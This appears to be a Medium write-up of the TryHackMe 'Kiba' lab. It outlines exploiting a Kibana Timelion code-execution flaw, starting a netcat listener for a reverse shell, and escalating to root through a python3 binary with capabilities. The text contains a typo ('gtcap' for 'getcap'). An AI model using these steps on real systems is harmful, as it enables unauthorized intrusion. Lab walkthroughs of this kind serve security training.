KIBA WriteUp Tryhackme

TASK 1: Flags

#1 — What is the vulnerability that is specific to programming languages with prototype-based inheritance?

Answer: google it so some research and you’ll find the answer.

#2 — What is the version of visualization dashboard installed in the server?

Connect to http://10.10.113.146:5601 and go to “management”. The version of Kibana is displayed on the top left corner.

#3 — What is the CVE number for this vulnerability? This will be in the format: CVE-0000–0000

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

Answer: I gave the hint now find the answer.

#4 — Compromise the machine and locate user.txt

Also git clone the payload by clicking here

Start a listener(nc -nvlp 4444) and run the exploit:

Now we have the shell:

Once you cat user.txt you will get the user flag.

#5 — Capabilities is a concept that provides a security system that allows “divide” root privileges into different values

answer: No answer required

#6 — How would you recursively list all of these capabilities?

Answer: gtcap -r /

#7 — Escalate privileges and obtain root.txt

While checking the capabilities it reveals a custom pythom3 installation in /home/kiba/.hackmeplease/ :

Checking on GTFOBins what we can do with python related to capabilities reveals that we can escalate our privileges to root:

Let’s get the better shell and get the root flag. Use this website for best One liner payloads. And for reverse shell you can use this github repository.

Submit the flags.

--

--

--

e-JPT | MTA Security Fundamentals | Ethical Hacker Trainer | Cyber Crime Intervention Officer | Cybersecurity Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Secure Coding: First Steps and Best Practices — Zartis

Source TryHackMe Writeup

{UPDATE} Death Worm Free Hack Free Resources Generator

New Orleans is the latest victim of a string of Cyberattacks this year

Practicing Cyber-Hygiene

{UPDATE} Buraco Italiano Online Hack Free Resources Generator

Lyra Protocol: Passive Yield Replication, W.A.R.P & Immersive NFT Universe

Raiders Ready to Raid Samurai by CyberFi

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ayush Bagde

Ayush Bagde

e-JPT | MTA Security Fundamentals | Ethical Hacker Trainer | Cyber Crime Intervention Officer | Cybersecurity Researcher

More from Medium

HackTheBox StartingPoint - Meow Walkthrough

HTB Chase [easy] Forensics Challenge

Vulnhub : Pwned 1 Walkthrough

Network Services 2 (SMTP) — Tryhackme